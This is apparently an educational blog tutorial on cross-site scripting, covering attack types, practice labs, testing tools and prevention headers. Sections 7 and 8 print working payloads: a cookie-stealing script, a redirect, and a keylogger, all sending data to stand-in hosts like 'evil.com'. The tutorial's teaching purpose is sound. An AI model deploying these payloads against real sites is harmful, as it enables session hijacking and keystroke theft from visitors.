Learn Cross-Site Scripting (XSS) from Scratch – Beginner to Expert
๐ฐ 1. Introduction to XSS
✅ What is Cross-Site Scripting (XSS)?
XSS is a web vulnerability that allows attackers to inject malicious scripts into trusted websites.
✅ Why is XSS Dangerous?
It can compromise user data, steal sessions, impersonate users, or even spread malware.
✅ History & Importance
XSS has been consistently ranked in the OWASP Top 10 for web application vulnerabilities due to its impact and prevalence.
✅ Real-World Exploits
-
MySpace worm (Samy)
-
British Airways ticket hijacking
-
eBay phishing redirections
๐งช 2. How XSS Works
✅ Browsers render HTML + JavaScript as part of web content
✅ Vulnerable apps do not sanitize user input
✅ Malicious scripts are injected into pages
✅ These scripts then execute in users' browsers
๐ฏ 3. What Can an Attacker Do with XSS?
๐ Steal Cookies / Sessions
๐ญ Impersonate Users
๐ช Phishing Forms
๐ฃ Deliver Malware
๐ฎ Hijack User Inputs
๐งฌ 4. Types of XSS (With Examples)
๐น a) Reflected XSS
Occurs via form inputs, URLs, or search parameters
Example:
http://example.com/search?q=<script>alert(1)</script>
๐น b) Stored XSS
Stored in DB or server logs, executed when data is viewed
Example:
<script>alert('Stored XSS')</script>
๐น c) DOM-Based XSS
Manipulates the DOM without server interaction
Example:
var name = location.hash.substring(1);
document.getElementById("output").innerHTML = name;
// Input: #<script>alert(1)</script>
๐ 5. Where to Practice XSS (Safe Labs)
| Platform | Purpose |
|---|---|
| DVWA | Beginner-friendly web app |
| bWAPP | Full-feature testbed |
| WebGoat | Official OWASP training app |
| XSS Game | Learn XSS through fun levels |
| PortSwigger Labs | Real-world XSS labs with explanations |
๐งฐ 6. Tools for XSS Testing
๐ง Burp Suite – Intercept & modify requests
⚔️ XSStrike – Advanced automated XSS scanner
๐ฌ XSS Hunter – Track blind XSS payloads
๐ง HackBar (Firefox/Chrome extension) – Test payloads quickly
๐ฆ OWASP ZAP – Free, full-featured security scanner
๐ฅ 7. XSS Payloads (Basic to Advanced)
๐งช Basic:
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
๐งช Steal Cookie:
<script>fetch('http://evil.com?cookie='+document.cookie)</script>
๐งช Redirect Victim:
<script>window.location='http://attacker.com'</script>
๐งช Keylogger:
<script>
document.onkeypress=function(e){
fetch('http://evil.com?key='+e.key)}
</script>
๐ฆ Explore more payloads on GitHub:
๐ KIRAN-KUMAR-K3/vulnerability-payload-lists
๐จ 8. Real-World Scenario (Example)
A blog allows users to comment without sanitization:
<textarea name="comment"></textarea>
An attacker submits:
<script>new Image().src='http://evil.com?c='+document.cookie</script>
Result: Every user who visits the comment section unknowingly leaks their session.
๐ก️ 9. How to Prevent XSS
✅ Developer Best Practices:
-
Sanitize inputs on both client & server
-
Escape HTML entities (
<,>,",', etc.) -
Avoid using
innerHTML,document.write(), or unsafe evals
✅ HTTP Security Headers:
Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
✅ Use Secure Frameworks:
-
React – Escapes by default
-
Django – Has built-in XSS protection
-
Ruby on Rails – Auto-escapes outputs
๐ 10. Recommended Resources & Payloads
๐ Learning Labs:
๐งช Payload Repository:
๐ KIRAN-KUMAR-K3/vulnerability-payload-lists on GitHub
๐ 11. Conclusion & Learning Path
✅ XSS is powerful and highly common
✅ Learn the fundamentals before using tools
✅ Practice in legal and controlled environments
✅ Use responsibly to report bugs, not exploit users
✅ Keep contributing to a safer internet
KIRAN KUMAR K
Cybersecurity enthusiast and ethical hacker with expertise in penetration testing, network security, and VAPT. Skilled in identifying vulnerabilities, securing digital systems, and working with Linux and open-source tools. Passionate about IoT security, machine learning for anomaly detection, and cloud security. Always learning and exploring new cybersecurity threats to build safer digital environments. ๐
